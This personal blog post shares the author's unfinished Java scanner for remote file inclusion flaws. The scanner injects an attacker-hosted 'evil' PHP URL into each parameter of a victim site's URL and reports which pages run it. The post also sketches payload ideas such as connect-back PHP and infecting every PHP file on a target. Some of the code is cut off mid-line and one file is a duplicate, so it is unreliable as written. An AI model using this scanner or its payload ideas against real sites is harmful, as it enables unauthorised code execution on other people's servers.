Well it certainly is true, why not? That question never has a correct answer imo. It is the same question I asked myself yesterday. I was like thinking what to write on my blog (I was bored and thought that blog writing could help) after a while I just gave up (so lesson learned: only write when you actually have something to write). So today I fired up my browser(for the ones wondering, this is a personal opinion, I use: Opera {FTW!}, IE {nice}, FF {sucks}, I use them depending on what I need) and the first things I saw was this. Which is funny since it’s just a couple of days ago since I posted about python and now I see a nice and small python script to do funky stuff.
So I hadn’t even finished reading and I followed the first link I encountered which is this one. It’s a very nice write up on how to own IIS 5 using “mythical” exploits. So this brought me back to my first question a day earlier: why not? Since I didn’t have an answer for that, here is my never finished source code to scan for RFI(remote file inclusions). The whole reason I started out to code this scanner was because I’m lazy and I thought…why do it myself if I can automate it. If you want a overview about things you should and you shouldn’t automate on a pentest , read this write up.
Basically my todo list when I first wanted to code the scanner was as follow:
- implement looping through params
- implement setting params to evil url with evil php
- check response for specified keyword
Then when I was working on it and I had some better ideas to detect RFI which I then never got around to implement:
- create php which copies an image and renames it to evil.extension, then check if that exists, it’s more reliable then just checking if the page returns a certain keyword (renaming .php to .txt would be stupid, it would open the door for every single person out there)
- create a php which connects back, so the scanner only has to know if there has been a connect back from the ip it’s scanning (only works if allowed)
- create a php which has a time delay, the scanner would then just request the url twice , with and without evil php, and measure time difference
- infect all php files with a header that outputs “hi” then call the url again to clean all php files
So who knows maybe I will one day extend this scanner or maybe I’ll even attempt to rewrite it in python including the features I never got around to implement.
main.java
/*
* RfiScanner.java
*
* Created on 9 november 2007, 19:39
*
* @author DiabloHorn
*/
package rrfiscanner;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;
/**
*
* @author DiabloHorn
*/
public class RfiScanner {
private Proxy _conProxy;
private boolean _useProxy;
private String _SEARCH_WORD;
private String _vUrl,_aUrl;
/**
* @param args
*/
public RfiScanner(String vUrl,String aUrl) {
this._vUrl = vUrl;
this._aUrl = aUrl;
}
public void setUseProxy(boolean use){
this._useProxy = use;
}
public void setProxy(Proxy proxy){
this._conProxy = proxy;
}
public void setSearchWord(String word){
this._SEARCH_WORD = word;
}
public void scan(){
try {
PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
URLConnection uc = null;
while(victimURL.hasNext()) {
URL u = victimURL.next();
if (_useProxy) {
uc = u.openConnection(_conProxy);
} else {
uc = u.openConnection();
}
try{
System.out.println("SCANNING: " + u.toString());
BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
String c;
while ((c = r.readLine()) != null) {
if(c.indexOf(_SEARCH_WORD) != -1) {
System.out.println("VULNERABLE URL: " + u.toString());
break;//stop searching
}
}
}catch(IOException ioe){
//well do nothing
}
}
} catch (MalformedURLException mfue) {
System.err.println(mfue.toString());
} catch (Exception e) {
System.err.println(e.toString());
}
}
}
RfiScanner.java
/*
* RfiScanner.java
*
* Created on 9 november 2007, 19:39
*
* @author DiabloHorn
*/
package rrfiscanner;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;
/**
*
* @author DiabloHorn
*/
public class RfiScanner {
private Proxy _conProxy;
private boolean _useProxy;
private String _SEARCH_WORD;
private String _vUrl,_aUrl;
/**
* @param args
*/
public RfiScanner(String vUrl,String aUrl) {
this._vUrl = vUrl;
this._aUrl = aUrl;
}
public void setUseProxy(boolean use){
this._useProxy = use;
}
public void setProxy(Proxy proxy){
this._conProxy = proxy;
}
public void setSearchWord(String word){
this._SEARCH_WORD = word;
}
public void scan(){
try {
PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
URLConnection uc = null;
while(victimURL.hasNext()) {
URL u = victimURL.next();
if (_useProxy) {
uc = u.openConnection(_conProxy);
} else {
uc = u.openConnection();
}
try{
System.out.println("SCANNING: " + u.toString());
BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
String c;
while ((c = r.readLine()) != null) {
if(c.indexOf(_SEARCH_WORD) != -1) {
System.out.println("VULNERABLE URL: " + u.toString());
break;//stop searching
}
}
}catch(IOException ioe){
//well do nothing
}
}
} catch (MalformedURLException mfue) {
System.err.println(mfue.toString());
} catch (Exception e) {
System.err.println(e.toString());
}
}
}
PrepareURL.java
/*
* PrepareURL.java
* @author DiabloHorn
*/
package rrfiscanner;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Set;
/**
*
* @author DiabloHorn
*/
public class PrepareURL {
private static final int _nextItemInitialize = -1;
private String _victimURL;
private String _evilUrl;
private ArrayList
private int _nextItem;
/**
* @param victimUrl The URL of the site you want to inject stuff into it’s params
* @param attackUrl The “stuff”
* @throws MalformedURLException Wrong URL
*/
public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException {
this._victimURL = victimUrl;
this._evilUrl = attackUrl;
_nextItem = _nextItemInitialize;
fillList();
}
/**
* @return True if there is another element left, false otherwise
*/
public boolean hasNext() {
if(_nextItem == (_attackUrlList.size()-1)) {
return false;
}
return true;
}
/**
* @return Get the next url
*/
public URL next() {
_nextItem++;
return _attackUrlList.get(_nextItem);
}
/**
* This resets the class so you can loop again through the URL’s
*/
public void reset() {
_nextItem = _nextItemInitialize;
}
private void fillList() throws MalformedURLException {
String query = _victimURL.substring(_victimURL.indexOf(“?”)+1);
_attackUrlList = new ArrayList
if(query != null) {
HashMap
Set
Iterator
String str;
while(iParamNames.hasNext()) {
str = iParamNames.next();
_attackUrlList.add(new URL(_victimURL.replace(str+”=”+paramPairs.get(str), str+”=”+_evilUrl)));
}
}
}
/**
* @param query The query to be stripped down to parameters and it’s values
* @return A HashMap with paramname:paramvalue
*/
private HashMap
HashMap
String[] rawPairs = query.split(“&”);
for(int i=0;i
DiabloHorn 
how yo compile !
thks fren…i was looking for a java scanner ;) i ll recode it and redirect the o/p to IRC via PircBot framework ;)
Would you like to make an affiliation with my forum?
The link is: htpp://attackersc.altervista.org/ or http://attackersc.altervista.org/forums